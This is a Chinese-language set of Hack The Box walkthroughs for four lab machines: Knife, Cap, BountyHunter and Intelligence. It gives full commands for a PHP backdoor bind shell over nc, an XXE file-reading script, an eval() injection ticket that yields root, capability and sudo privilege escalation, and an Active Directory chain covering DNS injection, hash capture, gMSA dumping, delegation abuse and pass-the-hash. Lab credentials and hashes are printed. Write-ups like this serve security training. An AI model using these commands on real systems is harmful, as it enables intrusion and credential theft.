HTB_Set_2

随缘更新

Knife

端口扫描

1
2
3
4
5
6
7
8
9
nmap -sV -Pn -T5 10.10.10.242

Nmap scan report for 10.10.10.242
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

漏洞利用

得到PHP版本信息

1
2
3
4
5
6
7
curl -I http://10.10.10.242/

HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 05:54:34 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

查询得到相关漏洞

1
2
3
4
5
6
7
8
9
searchsploit php 8.1 dev

----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

将Bash开放到目标服务器9876端口,并用nc连接

1
2
curl -H "User-Agentt: zerodiumsystem('mkfifo /tmp/bufferfly; cat /tmp/bufferfly | /bin/bash -i 2>&1 | nc -l 9876 > /tmp/bufferfly');" http://10.10.10.242/
nc 10.10.10.242 9876
1
2
3
cat /home/james/user.txt

71a8b414816d223319c095a64edbae6c

权限提升

查看sudo权限

1
2
3
4
5
6
7
sudo -l

Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
1
sudo -u root knife exec --exec "exec '/bin/bash -i'"
1
2
3
cat /root/root.txt

6fa9527622b5b0396511a575bd529b42

Cap

端口扫描

1
2
3
4
5
6
7
8
9
10
nmap -sV -Pn -T5 10.10.10.245

Nmap scan report for 10.10.10.245
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

漏洞利用

下载流量包

1
2
curl -O http://10.10.10.245/download/0
wireshark 0

得到FTP登入凭证
nathan:Buck3tH4TF0RM3!

1
2
ssh nathan@10.10.10.245
Buck3tH4TF0RM3!
1
2
3
cat /home/nathan/user.txt

f514ef062a27e672c5e88001061d8c5a

权限提升

查看capability

1
2
3
4
5
6
7
getcap /* -r 2>/dev/null

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

使用python进行提权

1
2
3
4
/usr/bin/python3.8 -c 'import os;os.setuid(0);os.system("/bin/bash")'
cat /root/root.txt

64941cc0edb38d723f72d34453780c90

BountyHunter

端口扫描

1
2
3
4
5
6
7
8
9
nmap -sV -Pn -T5  10.10.11.100

Nmap scan report for 10.10.11.100
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

路径扫描

1
2
3
dirb http://10.10.11.100/ -X .php

+ http://10.10.11.100/db.php (CODE:200|SIZE:0)

漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import base64
import re
import requests

req = requests.session()
file = input()
payload = {"data":base64.b64encode(("""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=""" + file + """\">]>
<bugreport>
<title>&xxe;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>""").encode()).decode()}
url = "http://10.10.11.100/tracker_diRbPr00f314.php"
res=req.post(url=url, data=payload)
data = res.text
data = data.replace("\n", "")
result = base64.b64decode(re.findall("<td>Title:</td> <td>(.*?)</td>", data)[0].encode()).decode()
print(result)

读取/etc/passwd

1
development:x:1000:1000:Development:/home/development:/bin/bash

读取db.php

1
2
3
4
5
6
7
8
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

登入SSH服务

1
2
ssh development@10.10.11.100
m19RoAU0hP41A1sTsq6K
1
2
3
cat /home/development/user.txt

96248cc10e05f03e3b63eb59adfd9d4c

权限提升

1
2
3
4
5
6
7
8
9
10
11
cat /home/development/contract.txt

Hey team,

I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.

This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.

I set up the permissions for you to test this. Good luck.

-- John

查看sudo权限

1
2
3
4
5
6
7
8
sudo -l

Matching Defaults entries for development on bountyhunter:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

查看py文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()

def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue

if x.startswith("__Ticket Code:__"):
code_line = i+1
continue

if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False

def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close

main()

eval()可以进行执行命令

构造恶意文本

1
2
3
4
5
6
7
8
cat /tmp/1.md

# Skytrain Inc
## Ticket to Bridgeport
__Ticket Code:__
**11+eval("__import__('os').system('/bin/bash')")**
##Issued: 2021/06/21
#End Ticket

提权

1
2
sudo -u root /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
/tmp/1.md
1
2
3
cat /root/root.txt

d8b513ba7130a46641d2c65966f6b8e6

Intelligence

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -sV -sT -Pn 10.10.10.248

Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-18 12:54:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

漏洞利用

访问80端口,可以看到主页上有两个PDF的链接

尝试枚举其他PDF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#pdf.py
import requests
req = requests.session()
for i in range(3):
for j in range(1, 13):
for k in range(31):
year = str(2020 + i)
month = ("0" + str(j)) if len(str(j)) == 1 else str(j)
day = ("0" + str(k)) if len(str(k)) == 1 else str(k)
url = "http://10.10.10.248/documents/" + year + "-" + month + "-" + day + "-upload.pdf"
res = req.get(url)
if res.status_code == 200:
filename = year + "-" + month + "-" + day + "-upload.pdf"
print(filename)
file = open(filename, "wb")
file.write(res.content)

获取PDF的用户名

1
2
3
4
5
6
7
8
9
#!/bin/bash
#pdf.sh
filelist=`ls *.pdf`
filenum=`ls *.pdf|wc -l`
for ((i=1;i<=$filenum;i++))
do
filename[${i}]=`ls *.pdf| sed -n ${i}p`
echo `exiftool ${filename[${i}]} | grep Creator | awk -F \ '{print \$3}'` >> user
done

2020-06-04-upload.pdf中得到一个密码NewIntelligenceCorpUser9876

爆破SMB

1
2
3
crackmapexec smb 10.10.10.248 -d intelligence -u user -p NewIntelligenceCorpUser9876

SMB 10.10.10.248 445 DC [+] intelligence\Tiffany.Molina:NewIntelligenceCorpUser9876

查看SMB路径

1
2
3
4
5
6
7
8
9
10
11
smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY

获得user.txt

1
2
3
smbclient //10.10.10.248/users -U Tiffany.Molina NewIntelligenceCorpUser9876
cd Tiffany.Molina\Desktop\
get user.txt
1
2
3
cat user.txt

bbfd0948d53d769c6ec2fcc02181fa7b

权限提升

获取powershell脚本

1
2
smbclient //10.10.10.248/IT -U Tiffany.Molina NewIntelligenceCorpUser9876
get downdetector.ps1
1
2
3
4
5
6
7
8
9
10
11
12
cat downdetector.ps1

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

伪造域名

1
2
wget https://raw.githubusercontent.com/dirkjanm/krbrelayx/master/dnstool.py
python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 --action add -r webbufferfly.intelligence.htb -d 10.10.16.24 10.10.10.248

获取账户

1
2
3
responder -I tun0 -A

Ted.Graves::intelligence:a0ccbece497d44d6:5F06EFF458D65EF3D277BBEF99522C05:01010000000000006E002FBCEB7ED70155A10145AE3210F90000000002000800320041004400530001001E00570049004E002D00490056004200580046004E00320037003300340045000400140032004100440053002E004C004F00430041004C0003003400570049004E002D00490056004200580046004E00320037003300340045002E0032004100440053002E004C004F00430041004C000500140032004100440053002E004C004F00430041004C000800300030000000000000000000000000200000A9E570CA9FC3E890033A04EB61C9D3A383AF9C961FCC3E1B59979F2C02378B410A0010000000000000000000000000000000000009003E0048005400540050002F007700650062003100310034003500310034002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

爆破Hash

1
2
3
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Mr.Teddy (Ted.Graves)

获得凭证
Ted.Graves:Mr.Teddy

获取Hash

1
2
3
4
wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248

svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7

获取SPN

1
2
3
4
git clone https://github.com/the-useless-one/pywerview
python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data

msds-allowedtodelegateto: WWW/dc.intelligence.htb

获取ST

1
2
3
4
5
python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 secretsdump.py -k dc.intelligence.htb -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3:::

Hash登入

1
2
3
4
evil-winrm -i 10.10.10.248 -u administrator -H 9075113fe16cf74f7c0f9b27e882dad3
type c:\users\administrator\desktop\root.txt

0c6b9779d283e244e79b11c78fc1fb92